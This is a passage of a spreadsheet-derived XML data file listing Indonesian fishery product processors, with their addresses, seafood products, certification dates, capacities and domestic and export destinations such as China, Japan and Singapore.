    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Malang, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21557"/>
    <x v="544"/>
    <s v="CV. KARTIKA JAYA"/>
    <s v="Pulau Siali RT 019 RW 005, Kel. Kasu, Kec. Belakang Padang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Japuh, Selar, Tenggiri)"/>
    <d v="2020-10-14T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21558"/>
    <x v="544"/>
    <s v="CV. KARTIKA JAYA"/>
    <s v="Pulau Siali RT 019 RW 005, Kel. Kasu, Kec. Belakang Padang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Kerapu, Lebam, Bawal, Talang-talang, Kapas-kapas, Kakap, Kaci-kaci, Kurisi, Ekor Kuning, Barramundi)"/>
    <d v="2020-10-14T00:00:00"/>
    <n v="8000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21559"/>
    <x v="544"/>
    <s v="CV. KARTIKA JAYA"/>
    <s v="Pulau Siali RT 019 RW 005, Kel. Kasu, Kec. Belakang Padang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-14T00:00:00"/>
    <n v="500"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21560"/>
    <x v="109"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Kerapu, Kakap Merah)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Australia, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21563"/>
    <x v="545"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Dusun Sibaganding, Kel. Janggir Leto, Kec. Panei, Kabupaten Simalungun&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Air Tawar Bernilai Tambah Beku (Fillet Nila Sambal Pedas Manis Thailand)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="2000000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21565"/>
    <x v="193"/>
    <s v="PT. KRISPI INDUSTRI INDONESIA"/>
    <s v="Dusun Banyu Urip RT 001 RW 001, Kel. Mojorejo, Kec. Pungging, Kabupaten Mojokerto&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Cumi-cumi"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="106300"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21566"/>
    <x v="546"/>
    <s v="SAPUTRA SNACK"/>
    <s v="Jl. Tenis Gg. Pro XL No.17 RT 38, Kel. Api-Api, Kec. Bontang Utara, Kota Bontang&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Keripik Ikan Bawis"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Bontang"/>
    <m/>
  </r>
  <r>
    <n v="21567"/>
    <x v="547"/>
    <s v="PT. MENARA BAHARI NUSANTARA"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21568"/>
    <x v="547"/>
    <s v="PT. MENARA BAHARI NUSANTARA"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Bawal, Samge, Kakap, Kuro, Cunang)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21569"/>
    <x v="547"/>
    <s v="PT. MENARA BAHARI NUSANTARA"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Salem, Cakalang, Tenggiri)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21570"/>
    <x v="547"/>
    <s v="PT. MENARA BAHARI NUSANTARA"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21571"/>
    <x v="547"/>
    <s v="PT. MENARA BAHARI NUSANTARA"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ubur-ubur Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21573"/>
    <x v="547"/>
    <s v="PT. MENARA BAHARI NUSANTARA"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21577"/>
    <x v="548"/>
    <s v="PT. MITRA LAUTAN MANDIRI"/>
    <s v="Jl. Muara Baru RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21578"/>
    <x v="548"/>
    <s v="PT. MITRA LAUTAN MANDIRI"/>
    <s v="Jl. Muara Baru RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Samge, Kuro, Cunang)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21579"/>
    <x v="548"/>
    <s v="PT. MITRA LAUTAN MANDIRI"/>
    <s v="Jl. Muara Baru RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Salem, Cakalang, Tenggiri)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21580"/>
    <x v="548"/>
    <s v="PT. MITRA LAUTAN MANDIRI"/>
    <s v="Jl. Muara Baru RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21581"/>
    <x v="548"/>
    <s v="PT. MITRA LAUTAN MANDIRI"/>
    <s v="Jl. Muara Baru RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21582"/>
    <x v="548"/>
    <s v="PT. MITRA LAUTAN MANDIRI"/>
    <s v="Jl. Muara Baru RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21583"/>
    <x v="549"/>
    <s v="PT. JALADHI HITA ABADI"/>
    <s v="Jl. Muara Baru RT 22 RW 17 Room 7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21584"/>
    <x v="549"/>
    <s v="PT. JALADHI HITA ABADI"/>
    <s v="Jl. Muara Baru RT 22 RW 17 Room 7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Kerapu, Layur, Samge, Kuro, Cunang)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21585"/>
    <x v="549"/>
    <s v="PT. JALADHI HITA ABADI"/>
    <s v="Jl. Muara Baru RT 22 RW 17 Room 7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Salem, Cakalang, Tenggiri)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21586"/>
    <x v="549"/>
    <s v="PT. JALADHI HITA ABADI"/>
    <s v="Jl. Muara Baru RT 22 RW 17 Room 7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21587"/>
    <x v="549"/>
    <s v="PT. JALADHI HITA ABADI"/>
    <s v="Jl. Muara Baru RT 22 RW 17 Room 7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21588"/>
    <x v="549"/>
    <s v="PT. JALADHI HITA ABADI"/>
    <s v="Jl. Muara Baru RT 22 RW 17 Room 7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21589"/>
    <x v="550"/>
    <s v="PT. SUMBER YALASAMUDRA"/>
    <s v="Jl. Sampangan No.19, Kel. Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Layur)"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21590"/>
    <x v="550"/>
    <s v="PT. SUMBER YALASAMUDRA"/>
    <s v="Jl. Sampangan No. 19 Muncar, Kel. Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Sukang)"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="21591"/>
    <x v="550"/>
    <s v="PT. SUMBER YALASAMUDRA"/>
    <s v="Jl. Sampangan No. 19 Muncar, Kel. Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Ikan"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="2400000"/>
    <s v="Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21592"/>
    <x v="550"/>
    <s v="PT. SUMBER YALASAMUDRA"/>
    <s v="Jl. Sampangan No.19, Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="4300000"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Bandar Lampung, Kota Balikpapan, Kota Samarinda, Kota Ternate, Kota Sorong, Kabupaten Merauke"/>
    <m/>
  </r>
  <r>
    <n v="21593"/>
    <x v="551"/>
    <s v="PT. PAHALA SAMUDERA FISHERY INDUSTRIES"/>
    <s v="Jl. Gajah Mada No.3-5 RT 001 RW 008 Komplek Duta Merlin Blok B 31-32, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Banjar, Layang, Cakalang)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="3174618"/>
    <s v="Kota Medan, Kota Denpasar"/>
    <s v="Japan, Korea, Democratic People's Republic of, Mauritius, Seychelles, Singapore, Sri Lanka, Suriname, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="21601"/>
    <x v="552"/>
    <s v="DUO MITRA RAYA"/>
    <s v="Jalan Cibolang Raya Gang Swadaya RT.28/06, Kel. Cibatu, Kec. Cisaat, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Baby Fish"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="800"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Pusat, Kabupaten Sukabumi, Kabupaten Cianjur, Kabupaten Bandung, Kota Sukabumi, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="21602"/>
    <x v="552"/>
    <s v="DUO MITRA RAYA"/>
    <s v="Jalan Cibolang Raya Gang Swadaya RT.28/06, Kel. Cibatu, Kec. Cisaat, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Sereal Patin"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Timur, Kabupaten Sukabumi, Kabupaten Cianjur, Kota Sukabumi, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="21603"/>
    <x v="553"/>
    <s v="PT. DACHAN MUSTIKA AURORA"/>
    <s v="Jl. Kepiting RT 03, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Beku"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="480000"/>
    <m/>
    <s v="Hong Kong, Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21605"/>
    <x v="551"/>
    <s v="PT, PAHALA SAMUDERA FISHERY INDUSTRIES"/>
    <s v="Jl, Gajah Mada No,3-5 RT 001 RW 008 Komplek Duta Merlin Blok B 31-32, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="509809"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21606"/>
    <x v="551"/>
    <s v="PT, PAHALA SAMUDERA FISHERY INDUSTRIES"/>
    <s v="Jl, Gajah Mada No,3-5 RT 001 RW 008 Komplek Duta Merlin Blok B 31-32, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Escolar, Semar, Ayam-ayam)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="7171"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21610"/>
    <x v="321"/>
    <s v="PT. TRITOBA SAMUDERA INDONESIA"/>
    <s v="Jl. Muara Baru Ujung No 1,2,11,12 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Cakalang)"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21615"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21616"/>
    <x v="554"/>
    <s v="PT, AGUNG MANDIRI LESTARI"/>
    <s v="Jl, Raya Narogong KM 77, Kel, Cikiwul, Kec, Bantar Gebang, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="142843.5"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Surabaya, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21621"/>
    <x v="555"/>
    <s v="PT. INNI PIONEER FOOD INDUSTRY"/>
    <s v="Jl. Desa Gintungkerta, Kel. Gintungkerta, Kec. Klari, Kabupaten Karawang&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Bekicot Kaleng"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="200000"/>
    <s v="Kabupaten Bekasi"/>
    <s v="Australia, Canada, Germany, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, South Africa, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="21624"/>
    <x v="556"/>
    <s v="PT. BONANZA PRATAMA ABADI"/>
    <s v="Jl. P. Aji Iskandar RT 016, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="1050000"/>
    <m/>
    <s v="Hong Kong, Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21625"/>
    <x v="556"/>
    <s v="PT. BONANZA PRATAMA ABADI"/>
    <s v="Jl. P. Aji Iskandar RT 016, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Belgium"/>
  </r>
  <r>
    <n v="21626"/>
    <x v="556"/>
    <s v="PT. BONANZA PRATAMA ABADI"/>
    <s v="Jl. P. Aji Iskandar RT 016, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Nobashi Beku"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="66000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21627"/>
    <x v="557"/>
    <s v="CV. SAFAAT JAYA MANDIRI"/>
    <s v="Desa Prigri RT 005 RW 001, Kel. Prigi, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="10200"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21631"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Hidup"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21632"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21633"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Segar (Sotong, Cumi-cumi)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21634"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Kerapu, Layur, Jenaha, Sukang, Bawal, Barramundi)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21635"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Segar"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21636"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21637"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21638"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21639"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21640"/>
    <x v="558"/>
    <s v="PT. GRHA MINA SEJAHTERA"/>
    <s v="Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21641"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="969154"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Cimahi, Kota Tangerang Selatan"/>
    <s v="Brunei Darussalam, Japan, Philippines, Saudi Arabia, Thailand, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="21642"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Bernilai Tambah Beku (Tempura Udang, Pangsit Udang, Ebi Katsu, Siomay Udang, Bakso Udang, Kakiage Ebi, Golden Money Bag, Tempura Set Udang)"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="319173"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Cimahi, Kota Tangerang Selatan"/>
    <s v="Brunei Darussalam, Japan, Philippines, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="21644"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Hoki)"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21645"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21646"/>
    <x v="560"/>
    <s v="CV. MAJU JAYA BERKAT SEJAHTERA"/>
    <s v="Jl. Kapuk Kamal VII No.73 RT 3 RW 3, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="Australia, China, India, Japan, Korea, Democratic People's Republic of, Norway, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21647"/>
    <x v="560"/>
    <s v="CV. MAJU JAYA BERKAT SEJAHTERA"/>
